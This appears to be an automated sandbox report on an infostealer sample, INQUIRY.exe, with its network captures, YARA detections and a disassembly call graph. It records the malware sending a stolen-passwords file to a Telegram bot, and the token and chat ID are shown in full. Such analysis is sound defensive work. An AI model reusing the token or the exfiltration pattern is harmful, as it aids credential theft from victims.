                                                                                            Dec 26, 2024 02:45:02.335547924 CET1.1.1.1192.168.2.40xb91dNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:02.335547924 CET1.1.1.1192.168.2.40xb91dNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:02.335547924 CET1.1.1.1192.168.2.40xb91dNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:02.335547924 CET1.1.1.1192.168.2.40xb91dNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:02.335547924 CET1.1.1.1192.168.2.40xb91dNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:02.335547924 CET1.1.1.1192.168.2.40xb91dNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:16.329998016 CET1.1.1.1192.168.2.40x9bb0No error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:16.329998016 CET1.1.1.1192.168.2.40x9bb0No error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                            Dec 26, 2024 02:45:25.122526884 CET1.1.1.1192.168.2.40x686bNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • reallyfreegeoip.org
                                                                                            • api.telegram.org
                                                                                            • checkip.dyndns.org

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449731193.122.6.168807348C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Dec 26, 2024 02:45:02.461193085 CET151OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Connection: Keep-Alive
                                                                                            Dec 26, 2024 02:45:13.397192955 CET273INHTTP/1.1 200 OK
                                                                                            Date: Thu, 26 Dec 2024 01:45:13 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                            Dec 26, 2024 02:45:13.401732922 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Dec 26, 2024 02:45:15.982127905 CET273INHTTP/1.1 200 OK
                                                                                            Date: Thu, 26 Dec 2024 01:45:15 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                            Dec 26, 2024 02:45:23.131849051 CET127OUTGET / HTTP/1.1
                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                            Host: checkip.dyndns.org
                                                                                            Dec 26, 2024 02:45:24.981524944 CET273INHTTP/1.1 200 OK
                                                                                            Date: Thu, 26 Dec 2024 01:45:24 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Cache-Control: no-cache
                                                                                            Pragma: no-cache
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                            HTTPS Proxied Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.449733172.67.177.1344437348C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-26 01:45:17 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                            Host: reallyfreegeoip.org
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-26 01:45:17 UTC856INHTTP/1.1 200 OK
                                                                                            Date: Thu, 26 Dec 2024 01:45:17 GMT
                                                                                            Content-Type: text/xml
                                                                                            Content-Length: 362
                                                                                            Connection: close
                                                                                            Age: 492306
                                                                                            Cache-Control: max-age=31536000
                                                                                            cf-cache-status: HIT
                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJVisECA4ytE2KX%2FELbrKjuSP3j5juoCiSjO0dstH%2FGaTDXlsI4Qq9V0sagUO4QI2of5dRoBb47je0RK2ETjkdw6pjhq0Ae5tkkvWPAmu%2BoCgYbbzqz%2BI58jwtfkFOLtAOsZB1YH"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8f7d63fe6a4a72bc-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1833&min_rtt=1831&rtt_var=691&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=699&delivery_rate=1578378&cwnd=252&unsent_bytes=0&cid=745f07eaaa2d0605&ts=452&x=0"
                                                                                            2024-12-26 01:45:17 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.449739149.154.167.2204437348C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2024-12-26 01:45:26 UTC295OUTPOST /bot7708662779:AAH6Et2SseJQ86UUKPaQRakBrlKtq8QtlJg/sendDocument?chat_id=5839829477&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary================8dd25250e9b6ca7
                                                                                            Host: api.telegram.org
                                                                                            Content-Length: 1090
                                                                                            Connection: Keep-Alive
                                                                                            2024-12-26 01:45:26 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 32 35 32 35 30 65 39 62 36 63 61 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                            Data Ascii: --===============8dd25250e9b6ca7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                            2024-12-26 01:45:27 UTC388INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0
                                                                                            Date: Thu, 26 Dec 2024 01:45:26 GMT
                                                                                            Content-Type: application/json
                                                                                            Content-Length: 556
                                                                                            Connection: close
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            Access-Control-Allow-Origin: *
                                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                            2024-12-26 01:45:27 UTC556INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 37 34 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 30 38 36 36 32 37 37 39 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 4f 56 41 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 6e 6f 76 61 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 38 33 39 38 32 39 34 37 37 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 6b 77 61 6e 64 61 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6b 75 6c 6c 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 69 67 34 6d 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 31 37 37 35 32 36 2c 22 64 6f 63 75
                                                                                            Data Ascii: {"ok":true,"result":{"message_id":27489,"from":{"id":7708662779,"is_bot":true,"first_name":"NOVA","username":"Skullsnovabot"},"chat":{"id":5839829477,"first_name":"Makwanda","last_name":"Skulls","username":"Big4m","type":"private"},"date":1735177526,"docu


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:20:44:59
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0xa10000
                                                                                            File size:1'091'584 bytes
                                                                                            MD5 hash:BA7B76B0763B1488A2AEE0892BDBBF12
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1694806382.0000000001DB0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:20:44:59
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0x1f0000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:20:44:59
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0xa10000
                                                                                            File size:1'091'584 bytes
                                                                                            MD5 hash:BA7B76B0763B1488A2AEE0892BDBBF12
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.1709473928.0000000001DE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:20:45:00
                                                                                            Start date:25/12/2024
                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                                                                                            Imagebase:0xb70000
                                                                                            File size:45'984 bytes
                                                                                            MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.4149427302.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
                                                                                            • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.4150460368.0000000003116000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:high
                                                                                            Has exited:false

                                                                                            Disassembly

                                                                                            Reset < >

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.7%
                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                              Signature Coverage:5.9%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:160
                                                                                              execution_graph 103505 a13633 103506 a1366a 103505->103506 103507 a136e7 103506->103507 103508 a13688 103506->103508 103544 a136e5 103506->103544 103510 a4d0cc 103507->103510 103511 a136ed 103507->103511 103512 a13695 103508->103512 103513 a1374b PostQuitMessage 103508->103513 103509 a136ca DefWindowProcW 103547 a136d8 103509->103547 103554 a21070 10 API calls Mailbox 103510->103554 103516 a136f2 103511->103516 103517 a13715 SetTimer RegisterWindowMessageW 103511->103517 103514 a4d154 103512->103514 103515 a136a0 103512->103515 103513->103547 103570 a72527 71 API calls _memset 103514->103570 103520 a13755 103515->103520 103521 a136a8 103515->103521 103524 a136f9 KillTimer 103516->103524 103525 a4d06f 103516->103525 103522 a1373e CreatePopupMenu 103517->103522 103517->103547 103519 a4d0f3 103555 a21093 341 API calls Mailbox 103519->103555 103552 a144a0 64 API calls _memset 103520->103552 103527 a136b3 103521->103527 103528 a4d139 103521->103528 103522->103547 103550 a1443a Shell_NotifyIconW _memset 103524->103550 103531 a4d074 103525->103531 103532 a4d0a8 MoveWindow 103525->103532 103534 a136be 103527->103534 103535 a4d124 103527->103535 103528->103509 103569 a67c36 59 API calls Mailbox 103528->103569 103529 a4d166 103529->103509 103529->103547 103537 a4d097 SetFocus 103531->103537 103538 a4d078 103531->103538 103532->103547 103534->103509 103556 a1443a Shell_NotifyIconW _memset 103534->103556 103568 a72d36 81 API calls _memset 103535->103568 103536 a13764 103536->103547 103537->103547 103538->103534 103540 a4d081 103538->103540 103539 a1370c 103551 a13114 DeleteObject DestroyWindow Mailbox 103539->103551 103553 a21070 10 API calls Mailbox 103540->103553 103544->103509 103548 a4d118 103557 a1434a 103548->103557 103550->103539 103551->103547 103552->103536 103553->103547 103554->103519 103555->103534 103556->103548 103558 a14375 _memset 103557->103558 103571 a14182 103558->103571 103561 a143fa 103563 a14430 Shell_NotifyIconW 103561->103563 103564 a14414 Shell_NotifyIconW 103561->103564 103565 a14422 103563->103565 103564->103565 103575 a1407c 103565->103575 103567 a14429 103567->103544 103568->103536 103569->103544 103570->103529 103572 a4d423 103571->103572 103573 a14196 103571->103573 103572->103573 103574 a4d42c DestroyIcon 103572->103574 103573->103561 103597 a72f94 62 API calls _W_store_winword 103573->103597 103574->103573 103576 a14098 103575->103576 103577 a1416f Mailbox 103575->103577 103598 a17a16 103576->103598 103577->103567 103580 a140b3 103603 a17bcc 103580->103603 103581 a4d3c8 LoadStringW 103584 a4d3e2 103581->103584 103583 a140c8 103583->103584 103585 a140d9 103583->103585 103586 a17b2e 59 API calls 103584->103586 103587 a140e3 103585->103587 103588 a14174 103585->103588 103591 a4d3ec 103586->103591 103612 a17b2e 103587->103612 103621 a18047 103588->103621 103593 a140ed _memset _wcscpy 103591->103593 103625 a17cab 103591->103625 103595 a14155 Shell_NotifyIconW 103593->103595 103594 a4d40e 103596 a17cab 59 API calls 103594->103596 103595->103577 103596->103593 103597->103561 103632 a30db6 103598->103632 103600 a17a3b 103642 a18029 103600->103642 103604 a17c45 103603->103604 103605 a17bd8 __wsetenvp 103603->103605 103674 a17d2c 103604->103674 103608 a17c13 103605->103608 103609 a17bee 103605->103609 103607 a17bf6 _memmove 103607->103583 103611 a18029 59 API calls 103608->103611 103673 a17f27 59 API calls Mailbox 103609->103673 103611->103607 103613 a17b40 103612->103613 103614 a4ec6b 103612->103614 103682 a17a51 103613->103682 103688 a67bdb 59 API calls _memmove 103614->103688 103617 a17b4c 103617->103593 103618 a4ec75 103619 a18047 59 API calls 103618->103619 103620 a4ec7d Mailbox 103619->103620 103622 a18052 103621->103622 103623 a1805a 103621->103623 103689 a17f77 59 API calls 2 library calls 103622->103689 103623->103593 103626 a4ed4a 103625->103626 103627 a17cbf 103625->103627 103629 a18029 59 API calls 103626->103629 103690 a17c50 103627->103690 103631 a4ed55 __wsetenvp _memmove 103629->103631 103630 a17cca 103630->103594 103635 a30dbe 103632->103635 103634 a30dd8 103634->103600 103635->103634 103637 a30ddc std::exception::exception 103635->103637 103645 a3571c 103635->103645 103662 a333a1 DecodePointer 103635->103662 103663 a3859b RaiseException 103637->103663 103639 a30e06 103664 a384d1 58 API calls _free 103639->103664 103641 a30e18 103641->103600 103643 a30db6 Mailbox 59 API calls 103642->103643 103644 a140a6 103643->103644 103644->103580 103644->103581 103646 a35797 103645->103646 103649 a35728 103645->103649 103671 a333a1 DecodePointer 103646->103671 103648 a3579d 103672 a38b28 58 API calls __getptd_noexit 103648->103672 103652 a3575b RtlAllocateHeap 103649->103652 103655 a35733 103649->103655 103656 a35783 103649->103656 103660 a35781 103649->103660 103668 a333a1 DecodePointer 103649->103668 103652->103649 103653 a3578f 103652->103653 103653->103635 103655->103649 103665 a3a16b 58 API calls 2 library calls 103655->103665 103666 a3a1c8 58 API calls 7 library calls 103655->103666 103667 a3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103655->103667 103669 a38b28 58 API calls __getptd_noexit 103656->103669 103670 a38b28 58 API calls __getptd_noexit 103660->103670 103662->103635 103663->103639 103664->103641 103665->103655 103666->103655 103668->103649 103669->103660 103670->103653 103671->103648 103672->103653 103673->103607 103675 a17d3a 103674->103675 103677 a17d43 _memmove 103674->103677 103675->103677 103678 a17e4f 103675->103678 103677->103607 103679 a17e62 103678->103679 103681 a17e5f _memmove 103678->103681 103680 a30db6 Mailbox 59 API calls 103679->103680 103680->103681 103681->103677 103683 a17a5f 103682->103683 103684 a17a85 _memmove 103682->103684 103683->103684 103685 a30db6 Mailbox 59 API calls 103683->103685 103684->103617 103684->103684 103686 a17ad4 103685->103686 103687 a30db6 Mailbox 59 API calls 103686->103687 103687->103684 103688->103618 103689->103623 103691 a17c5f __wsetenvp 103690->103691 103692 a17c70 _memmove 103691->103692 103693 a18029 59 API calls 103691->103693 103692->103630 103694 a4ed07 _memmove 103693->103694 103695 a11055 103700 a12649 103695->103700 103710 a17667 103700->103710 103705 a12754 103706 a1105a 103705->103706 103718 a13416 59 API calls 2 library calls 103705->103718 103707 a32d40 103706->103707 103726 a32c44 103707->103726 103709 a11064 103711 a30db6 Mailbox 59 API calls 103710->103711 103712 a17688 103711->103712 103713 a30db6 Mailbox 59 API calls 103712->103713 103714 a126b7 103713->103714 103715 a13582 103714->103715 103719 a135b0 103715->103719 103718->103705 103720 a135bd 103719->103720 103721 a135a1 103719->103721 103720->103721 103722 a135c4 RegOpenKeyExW 103720->103722 103721->103705 103722->103721 103723 a135de RegQueryValueExW 103722->103723 103724 a13614 RegCloseKey 103723->103724 103725 a135ff 103723->103725 103724->103721 103725->103724 103727 a32c50 __initptd 103726->103727 103734 a33217 103727->103734 103733 a32c77 __initptd 103733->103709 103751 a39c0b 103734->103751 103736 a32c59 103737 a32c88 DecodePointer DecodePointer 103736->103737 103738 a32c65 103737->103738 103739 a32cb5 103737->103739 103748 a32c82 103738->103748 103739->103738 103797 a387a4 59 API calls 2 library calls 103739->103797 103741 a32d18 EncodePointer EncodePointer 103741->103738 103742 a32cc7 103742->103741 103743 a32cec 103742->103743 103798 a38864 61 API calls 2 library calls 103742->103798 103743->103738 103747 a32d06 EncodePointer 103743->103747 103799 a38864 61 API calls 2 library calls 103743->103799 103746 a32d00 103746->103738 103746->103747 103747->103741 103800 a33220 103748->103800 103752 a39c2f EnterCriticalSection 103751->103752 103753 a39c1c 103751->103753 103752->103736 103758 a39c93 103753->103758 103755 a39c22 103755->103752 103782 a330b5 58 API calls 3 library calls 103755->103782 103759 a39c9f __initptd 103758->103759 103760 a39cc0 103759->103760 103761 a39ca8 103759->103761 103769 a39ce1 __initptd 103760->103769 103786 a3881d 58 API calls 2 library calls 103760->103786 103783 a3a16b 58 API calls 2 library calls 103761->103783 103764 a39cad 103784 a3a1c8 58 API calls 7 library calls 103764->103784 103765 a39cd5 103767 a39ceb 103765->103767 103768 a39cdc 103765->103768 103773 a39c0b __lock 58 API calls 103767->103773 103787 a38b28 58 API calls __getptd_noexit 103768->103787 103769->103755 103770 a39cb4 103785 a3309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103770->103785 103775 a39cf2 103773->103775 103776 a39d17 103775->103776 103777 a39cff 103775->103777 103789 a32d55 103776->103789 103788 a39e2b InitializeCriticalSectionAndSpinCount 103777->103788 103780 a39d0b 103795 a39d33 LeaveCriticalSection _doexit 